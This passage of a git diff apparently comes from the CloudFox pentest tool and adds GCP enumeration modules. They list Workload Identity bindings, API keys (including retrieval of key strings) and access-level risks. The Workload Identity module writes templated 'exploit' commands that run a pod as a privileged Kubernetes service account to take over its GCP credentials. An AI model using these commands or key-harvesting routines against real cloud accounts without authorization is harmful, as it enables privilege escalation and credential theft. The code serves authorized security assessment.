+ } + } + + m.mu.Lock() + m.ProjectClusters[projectID] = clusterInfos + m.ProjectBindings[projectID] = bindings + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["workloadidentity-commands"] = &internal.LootFile{ + Name: "workloadidentity-commands", + Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, cwi := range clusterInfos { + m.addClusterToLoot(projectID, cwi) + } + for _, binding := range bindings { + m.addBindingToLoot(projectID, binding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s) in project %s", + len(clusterInfos), len(bindings), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } +} + +// findWorkloadIdentityBindings finds all IAM bindings that grant workloadIdentityUser role +// by querying the IAM policy ON each service account (resource-level, not project-level) +func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { + var bindings []WorkloadIdentityBinding + + iamSvc := IAMService.New() + serviceAccounts, err := iamSvc.ServiceAccountsBasic(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list service accounts in project %s", projectID)) + return bindings + } + + // Get an IAM service client for SA-level policy queries + iamService, err := iam.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not create IAM service client") + return bindings + } + + for _, sa := range serviceAccounts { + // Get the IAM policy ON the service account resource (not 
project-level)
+		saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email)
+		policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do()
+		if err != nil {
+			continue // best-effort: skip service accounts whose IAM policy we cannot read
+		}
+
+		for _, binding := range policy.Bindings {
+			if binding.Role == "roles/iam.workloadIdentityUser" {
+				for _, member := range binding.Members {
+					if strings.HasPrefix(member, "serviceAccount:") && strings.Contains(member, ".svc.id.goog") {
+						ns, ksa := parseWorkloadIdentityMember(member)
+						if ns != "" && ksa != "" {
+							wib := WorkloadIdentityBinding{
+								ProjectID:         projectID,
+								ClusterName:       clusterName,
+								ClusterLocation:   location,
+								WorkloadPool:      workloadPool,
+								KubernetesNS:      ns,
+								KubernetesSA:      ksa,
+								GCPServiceAccount: sa.Email,
+								GCPSARoles:        sa.Roles,
+								BindingType:       "workloadIdentityUser",
+							}
+							wib.IsHighPrivilege = isHighPrivilegeServiceAccount(sa)
+							bindings = append(bindings, wib)
+						}
+					}
+				}
+			}
+		}
+	}
+
+	return bindings
+}
+
+// parseWorkloadIdentityMember parses a workload identity member string.
+// Format: serviceAccount:PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME]
+// (the square brackets around NAMESPACE/KSA_NAME are literal characters in the member string).
+func parseWorkloadIdentityMember(member string) (namespace, serviceAccount string) {
+	member = strings.TrimPrefix(member, "serviceAccount:")
+
+	bracketStart := strings.Index(member, "[")
+	bracketEnd := strings.Index(member, "]")
+
+	if bracketStart == -1 || bracketEnd == -1 || bracketEnd <= bracketStart {
+		return "", ""
+	}
+
+	nsAndSA := member[bracketStart+1 : bracketEnd]
+	parts := strings.Split(nsAndSA, "/")
+	if len(parts) == 2 {
+		return parts[0], parts[1]
+	}
+
+	return "", ""
+}
+
+// isHighPrivilegeServiceAccount checks if a service account has high-privilege roles
+func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool {
+	highPrivRoles := map[string]bool{
+		"roles/owner":                          true,
+		"roles/editor":                         true,
+		"roles/iam.serviceAccountAdmin":        true,
+		"roles/iam.serviceAccountKeyAdmin":     true,
+		"roles/iam.serviceAccountTokenCreator": true,
+		
"roles/resourcemanager.projectIamAdmin": true, + "roles/compute.admin": true, + "roles/container.admin": true, + "roles/secretmanager.admin": true, + "roles/storage.admin": true, + } + + for _, role := range sa.Roles { + if highPrivRoles[role] { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WorkloadIdentityModule) addClusterToLoot(projectID string, cwi ClusterWorkloadIdentity) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } + if cwi.WorkloadPoolEnabled { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# GKE CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Location: %s\n"+ + "# Workload Pool: %s\n"+ + "# Node Pools with WI: %d/%d\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Get cluster credentials:\n"+ + "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", + cwi.ClusterName, + cwi.Location, + cwi.WorkloadPool, + cwi.NodePoolsWithWI, + cwi.TotalNodePools, + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + ) + } +} + +func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding WorkloadIdentityBinding) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } + highPriv := "" + if binding.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# K8s SA BINDING: %s/%s -> %s%s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Cluster: %s (%s)\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + binding.ClusterName, + binding.ClusterLocation, + ) + + if binding.IsHighPrivilege && 
len(binding.GCPSARoles) > 0 { + lootFile.Contents += fmt.Sprintf( + "# GCP SA Roles: %s\n", + strings.Join(binding.GCPSARoles, ", "), + ) + } + + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# To exploit, create pod with this service account:\n"+ + "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ + "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", + binding.KubernetesSA, + binding.KubernetesNS, + binding.KubernetesNS, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *WorkloadIdentityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectClusters { + tables := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = WorkloadIdentityOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + m.CommandCounter.Error++ + } 
+} + +func (m *WorkloadIdentityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + allBindings := m.getAllBindings() + + tables := m.buildTables(allClusters, allBindings) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := WorkloadIdentityOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not write output") + } +} + +// buildTablesForProject builds tables for a specific project +func (m *WorkloadIdentityModule) buildTablesForProject(projectID string) []internal.TableFile { + clusters := m.ProjectClusters[projectID] + bindings := m.ProjectBindings[projectID] + return m.buildTables(clusters, bindings) +} + +// buildTables builds all tables from the given data +func (m *WorkloadIdentityModule) buildTables( + clusters []ClusterWorkloadIdentity, + bindings []WorkloadIdentityBinding, +) []internal.TableFile { + var tables []internal.TableFile + + // Clusters table + clustersHeader := []string{ + "Project", + "Cluster", + "Location", + "Cluster WI Enabled", + "Workload Pool", + "Node Pools WI Enabled", + } + + var clustersBody [][]string + for _, cwi := range clusters { + wiEnabled := "No" + if cwi.WorkloadPoolEnabled { + wiEnabled = "Yes" + } + workloadPool := "-" + if cwi.WorkloadPool != "" { + workloadPool = 
cwi.WorkloadPool + } + + nodePoolsWI := fmt.Sprintf("%d of %d", cwi.NodePoolsWithWI, cwi.TotalNodePools) + + clustersBody = append(clustersBody, []string{ + m.GetProjectName(cwi.ProjectID), + cwi.ClusterName, + cwi.Location, + wiEnabled, + workloadPool, + nodePoolsWI, + }) + } + + if len(clustersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-clusters", + Header: clustersHeader, + Body: clustersBody, + }) + } + + // Bindings table + bindingsHeader := []string{ + "Project", + "Cluster", + "K8s Namespace", + "K8s Service Account", + "GCP Service Account", + "High Privilege SA", + "SA Attack Paths", + } + + var bindingsBody [][]string + for _, binding := range bindings { + highPriv := "No" + if binding.IsHighPrivilege { + highPriv = "Yes" + } + + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, binding.GCPServiceAccount) + + bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.ProjectID), + binding.ClusterName, + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + attackPaths, + }) + } + + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + return tables +} diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go new file mode 100644 index 00000000..68e56511 --- /dev/null +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -0,0 +1,279 @@ +package accesspolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type AccessPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *AccessPolicyService { + return &AccessPolicyService{} +} + +func 
NewWithSession(session *gcpinternal.SafeSession) *AccessPolicyService { + return &AccessPolicyService{session: session} +} + +// getService returns an Access Context Manager service using cached session if available +func (s *AccessPolicyService) getService(ctx context.Context) (*accesscontextmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetAccessContextManagerService(ctx, s.session) + } + return accesscontextmanager.NewService(ctx) +} + +// AccessLevelInfo represents an access level (conditional access policy) +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + PolicyName string `json:"policyName"` + + // Basic level conditions + CombiningFunction string `json:"combiningFunction"` // AND or OR + Conditions []ConditionInfo `json:"conditions"` + + // Custom level + HasCustomLevel bool `json:"hasCustomLevel"` + CustomExpression string `json:"customExpression"` + + // Analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ConditionInfo represents a condition in an access level +type ConditionInfo struct { + IPSubnetworks []string `json:"ipSubnetworks"` + DevicePolicy *DevicePolicyInfo `json:"devicePolicy"` + RequiredAccessLevels []string `json:"requiredAccessLevels"` + Negate bool `json:"negate"` + Members []string `json:"members"` + Regions []string `json:"regions"` +} + +// DevicePolicyInfo represents device policy requirements +type DevicePolicyInfo struct { + RequireScreenLock bool `json:"requireScreenLock"` + RequireAdminApproval bool `json:"requireAdminApproval"` + RequireCorpOwned bool `json:"requireCorpOwned"` + AllowedEncryption []string `json:"allowedEncryptionStatuses"` + AllowedDeviceMgmt []string `json:"allowedDeviceManagementLevels"` + OSConstraints []string `json:"osConstraints"` +} + +// GCIPSettingsInfo represents Google Cloud Identity Platform settings +type GCIPSettingsInfo struct { + TenantIDs []string 
`json:"tenantIds"`
+	LoginPageURI string   `json:"loginPageUri"`
+}
+
+// ListAccessLevels retrieves all access levels for an organization's policy
+func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, error) {
+	ctx := context.Background()
+
+	service, err := s.getService(ctx)
+	if err != nil {
+		return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com")
+	}
+
+	var allLevels []AccessLevelInfo
+
+	// First, get access policies for the org
+	parent := fmt.Sprintf("organizations/%s", orgID)
+	policiesReq := service.AccessPolicies.List().Parent(parent)
+	err = policiesReq.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error {
+		for _, policy := range page.AccessPolicies {
+			policyName := extractPolicyName(policy.Name)
+
+			// Get access levels for this policy
+			levelsParent := fmt.Sprintf("accessPolicies/%s", policyName)
+			levelsReq := service.AccessPolicies.AccessLevels.List(levelsParent)
+			levelsReq.Pages(ctx, func(levelsPage *accesscontextmanager.ListAccessLevelsResponse) error {
+				for _, level := range levelsPage.AccessLevels {
+					info := s.parseAccessLevel(level, policyName)
+					allLevels = append(allLevels, info)
+				}
+				return nil
+			}) // NOTE(review): error from this inner Pages call is discarded — access levels under an unreadable policy are silently skipped; consider logging or propagating it
+		}
+		return nil
+	})
+	if err != nil {
+		return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com")
+	}
+
+	return allLevels, nil
+}
+
+// ListAccessLevelsForPolicy retrieves access levels for a specific policy
+func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]AccessLevelInfo, error) {
+	ctx := context.Background()
+
+	service, err := s.getService(ctx)
+	if err != nil {
+		return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com")
+	}
+
+	var levels []AccessLevelInfo
+
+	parent := fmt.Sprintf("accessPolicies/%s", policyName)
+	req := service.AccessPolicies.AccessLevels.List(parent)
+	err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error {
+		for _, level := 
range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *AccessPolicyService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + Description: level.Description, + PolicyName: policyName, + RiskReasons: []string{}, + } + + // Parse basic level + if level.Basic != nil { + info.CombiningFunction = level.Basic.CombiningFunction + + for _, condition := range level.Basic.Conditions { + condInfo := ConditionInfo{ + IPSubnetworks: condition.IpSubnetworks, + Negate: condition.Negate, + Members: condition.Members, + Regions: condition.Regions, + } + + for _, reqLevel := range condition.RequiredAccessLevels { + condInfo.RequiredAccessLevels = append(condInfo.RequiredAccessLevels, extractLevelName(reqLevel)) + } + + // Parse device policy + if condition.DevicePolicy != nil { + dp := condition.DevicePolicy + condInfo.DevicePolicy = &DevicePolicyInfo{ + RequireScreenLock: dp.RequireScreenlock, + RequireAdminApproval: dp.RequireAdminApproval, + RequireCorpOwned: dp.RequireCorpOwned, + AllowedEncryption: dp.AllowedEncryptionStatuses, + AllowedDeviceMgmt: dp.AllowedDeviceManagementLevels, + } + + for _, os := range dp.OsConstraints { + condInfo.DevicePolicy.OSConstraints = append(condInfo.DevicePolicy.OSConstraints, + fmt.Sprintf("%s:%s", os.OsType, os.MinimumVersion)) + } + } + + info.Conditions = append(info.Conditions, condInfo) + } + } + + // Parse custom level + if level.Custom != nil && level.Custom.Expr != nil { + info.HasCustomLevel = true + info.CustomExpression = level.Custom.Expr.Expression + } + + info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) + + return info +} + +func (s *AccessPolicyService) 
analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { + var reasons []string + score := 0 + + for _, condition := range level.Conditions { + // Check for overly broad IP ranges + for _, ip := range condition.IPSubnetworks { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Access level allows all IP addresses (0.0.0.0/0)") + score += 3 + break + } + } + + // Check for allUsers or allAuthenticatedUsers + for _, member := range condition.Members { + if member == "allUsers" { + reasons = append(reasons, "Access level includes allUsers") + score += 3 + } else if member == "allAuthenticatedUsers" { + reasons = append(reasons, "Access level includes allAuthenticatedUsers") + score += 2 + } + } + + // No device policy requirements + if condition.DevicePolicy == nil { + reasons = append(reasons, "No device policy requirements") + score += 1 + } else { + // Weak device policy + if !condition.DevicePolicy.RequireScreenLock { + reasons = append(reasons, "Does not require screen lock") + score += 1 + } + if !condition.DevicePolicy.RequireCorpOwned { + reasons = append(reasons, "Does not require corporate-owned device") + score += 1 + } + } + } + + // No conditions at all + if len(level.Conditions) == 0 && !level.HasCustomLevel { + reasons = append(reasons, "Access level has no conditions defined") + score += 2 + } + + // OR combining function is more permissive + if level.CombiningFunction == "OR" && len(level.Conditions) > 1 { + reasons = append(reasons, "Uses OR combining function (any condition grants access)") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := 
strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go new file mode 100644 index 00000000..1353e536 --- /dev/null +++ b/gcp/services/apikeysService/apikeysService.go @@ -0,0 +1,299 @@ +package apikeysservice + +import ( + "context" + "fmt" + "strings" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + apikeys "google.golang.org/api/apikeys/v2" +) + +type APIKeysService struct { + session *gcpinternal.SafeSession +} + +// New creates a new APIKeysService +func New() *APIKeysService { + return &APIKeysService{} +} + +// NewWithSession creates an APIKeysService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *APIKeysService { + return &APIKeysService{session: session} +} + +// getService returns an API Keys service client using cached session if available +func (s *APIKeysService) getService(ctx context.Context) (*apikeys.Service, error) { + if s.session != nil { + return sdk.CachedGetAPIKeysService(ctx, s.session) + } + return apikeys.NewService(ctx) +} + +// APIKeyInfo represents information about an API key +type APIKeyInfo struct { + Name string `json:"name"` // Full resource name + UID string `json:"uid"` // Unique identifier + DisplayName string `json:"displayName"` // User-friendly name + KeyString string `json:"keyString"` // The actual key value (if accessible) + ProjectID string `json:"projectId"` + CreateTime time.Time `json:"createTime"` + UpdateTime time.Time `json:"updateTime"` + DeleteTime time.Time `json:"deleteTime"` + Annotations map[string]string `json:"annotations"` + + // Restrictions + HasRestrictions bool `json:"hasRestrictions"` + AllowedAPIs []string `json:"allowedApis"` // API targets + AllowedReferers []string `json:"allowedReferers"` // HTTP referer restrictions 
+ AllowedIPs []string `json:"allowedIps"` // IP restrictions + AllowedAndroidApps []string `json:"allowedAndroidApps"` // Android app restrictions + AllowedIOSApps []string `json:"allowedIosApps"` // iOS app restrictions + RestrictionType string `json:"restrictionType"` // "browser", "server", "android", "ios", "none" + + // Security Analysis + IsUnrestricted bool `json:"isUnrestricted"` // No restrictions at all + RiskLevel string `json:"riskLevel"` // HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// ListAPIKeys retrieves all API keys in a project +func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + var keys []APIKeyInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Keys.List(parent) + err = req.Pages(ctx, func(page *apikeys.V2ListKeysResponse) error { + for _, key := range page.Keys { + keyInfo := s.parseAPIKey(key, projectID) + keys = append(keys, keyInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return keys, nil +} + +// GetAPIKey retrieves a single API key with its key string +func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + key, err := service.Projects.Locations.Keys.Get(keyName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + // Extract project ID from key name + // Format: projects/{project}/locations/global/keys/{key} + parts := strings.Split(keyName, "/") + projectID := "" + if len(parts) >= 2 { + projectID = parts[1] + } + + keyInfo := s.parseAPIKey(key, 
projectID) + return &keyInfo, nil +} + +// GetKeyString retrieves the key string value for an API key +func (s *APIKeysService) GetKeyString(keyName string) (string, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + resp, err := service.Projects.Locations.Keys.GetKeyString(keyName).Context(ctx).Do() + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return resp.KeyString, nil +} + +// parseAPIKey converts an API key response to APIKeyInfo +func (s *APIKeysService) parseAPIKey(key *apikeys.V2Key, projectID string) APIKeyInfo { + info := APIKeyInfo{ + Name: key.Name, + UID: key.Uid, + DisplayName: key.DisplayName, + ProjectID: projectID, + Annotations: key.Annotations, + RiskReasons: []string{}, + } + + // Parse times + if key.CreateTime != "" { + if t, err := time.Parse(time.RFC3339, key.CreateTime); err == nil { + info.CreateTime = t + } + } + if key.UpdateTime != "" { + if t, err := time.Parse(time.RFC3339, key.UpdateTime); err == nil { + info.UpdateTime = t + } + } + if key.DeleteTime != "" { + if t, err := time.Parse(time.RFC3339, key.DeleteTime); err == nil { + info.DeleteTime = t + } + } + + // Parse restrictions + if key.Restrictions != nil { + info.HasRestrictions = true + + // API restrictions + if key.Restrictions.ApiTargets != nil { + for _, target := range key.Restrictions.ApiTargets { + info.AllowedAPIs = append(info.AllowedAPIs, target.Service) + } + } + + // Browser restrictions (HTTP referers) + if key.Restrictions.BrowserKeyRestrictions != nil { + info.RestrictionType = "browser" + info.AllowedReferers = key.Restrictions.BrowserKeyRestrictions.AllowedReferrers + } + + // Server restrictions (IPs) + if key.Restrictions.ServerKeyRestrictions != nil { + info.RestrictionType = "server" + info.AllowedIPs = key.Restrictions.ServerKeyRestrictions.AllowedIps + } + + // Android restrictions + 
if key.Restrictions.AndroidKeyRestrictions != nil {
+			info.RestrictionType = "android"
+			for _, app := range key.Restrictions.AndroidKeyRestrictions.AllowedApplications {
+				info.AllowedAndroidApps = append(info.AllowedAndroidApps,
+					fmt.Sprintf("%s:%s", app.PackageName, app.Sha1Fingerprint))
+			}
+		}
+
+		// iOS restrictions
+		if key.Restrictions.IosKeyRestrictions != nil {
+			info.RestrictionType = "ios"
+			info.AllowedIOSApps = key.Restrictions.IosKeyRestrictions.AllowedBundleIds
+		}
+
+		// Check if truly restricted
+		if len(info.AllowedAPIs) == 0 &&
+			len(info.AllowedReferers) == 0 &&
+			len(info.AllowedIPs) == 0 &&
+			len(info.AllowedAndroidApps) == 0 &&
+			len(info.AllowedIOSApps) == 0 {
+			info.HasRestrictions = false
+			info.IsUnrestricted = true // NOTE(review): RestrictionType is left "" here, while the nil-Restrictions branch sets "none" — confirm downstream consumers treat both values as unrestricted
+		}
+	} else {
+		info.IsUnrestricted = true
+		info.RestrictionType = "none"
+	}
+
+	// Security analysis
+	info.RiskLevel, info.RiskReasons = s.analyzeAPIKeyRisk(info)
+
+	return info
+}
+
+// analyzeAPIKeyRisk determines the risk level of an API key
+func (s *APIKeysService) analyzeAPIKeyRisk(key APIKeyInfo) (string, []string) {
+	var reasons []string
+	score := 0
+
+	// Unrestricted keys are high risk
+	if key.IsUnrestricted {
+		reasons = append(reasons, "No restrictions applied - key can be used from anywhere")
+		score += 4
+	}
+
+	// No API restrictions
+	if len(key.AllowedAPIs) == 0 && !key.IsUnrestricted {
+		reasons = append(reasons, "No API restrictions - key can access all enabled APIs")
+		score += 2
+	}
+
+	// Overly permissive API access
+	for _, api := range key.AllowedAPIs {
+		if strings.Contains(api, "admin") || strings.Contains(api, "iam") {
+			reasons = append(reasons, fmt.Sprintf("Has access to sensitive API: %s", api))
+			score += 2
+		}
+	}
+
+	// Wildcard in referers
+	for _, referer := range key.AllowedReferers {
+		if referer == "*" || referer == "*.com" { // NOTE(review): only these two literal patterns are flagged; other broad referer wildcards pass unflagged
+			reasons = append(reasons, fmt.Sprintf("Overly permissive referer: %s", referer))
+			score += 2
+		}
+	}
+
+	// 0.0.0.0/0 in IPs
+	for _, ip := range 
key.AllowedIPs { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Allows access from any IP (0.0.0.0/0)") + score += 3 + } + } + + // Old keys + if !key.CreateTime.IsZero() { + age := time.Since(key.CreateTime) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is older than 1 year (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Determine risk level + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + + return "INFO", reasons +} + +// ListAPIKeysWithKeyStrings retrieves all API keys with their key strings +func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyInfo, error) { + keys, err := s.ListAPIKeys(projectID) + if err != nil { + return nil, err + } + + // Try to get key strings for each key + for i := range keys { + keyString, err := s.GetKeyString(keys[i].Name) + if err != nil { + // Skip - we might not have permission to get key strings + continue + } + keys[i].KeyString = keyString + } + + return keys, nil +} diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 60aed147..108ecf88 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -3,15 +3,19 @@ package artifactregistryservice import ( "context" "fmt" + "net/url" "strings" + "time" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" "google.golang.org/api/iterator" + iampb "google.golang.org/genproto/googleapis/iam/v1" 
locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -32,11 +36,49 @@ func New(client *artifactregistry.Client) ArtifactRegistryService { DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { return client.ListDockerImages(ctx, req, opts...) }, + RawClient: client, }, } return ars } +// NewWithSession creates an ArtifactRegistryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (ArtifactRegistryService, error) { + ctx := context.Background() + var client *artifactregistry.Client + var err error + + if session != nil { + client, err = artifactregistry.NewClient(ctx, session.GetClientOption()) + } else { + client, err = artifactregistry.NewClient(ctx) + } + if err != nil { + return ArtifactRegistryService{}, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + } + + ars := ArtifactRegistryService{ + Client: &ArtifactRegistryClientWrapper{ + Closer: client.Close, + RepositoryLister: func(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { + return client.ListRepositories(ctx, req, opts...) + }, + LocationLister: func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] { + return client.ListLocations(ctx, req, opts...) + }, + RepositoryGetter: func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) { + return client.GetRepository(ctx, req, opts...) + }, + DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { + return client.ListDockerImages(ctx, req, opts...) 
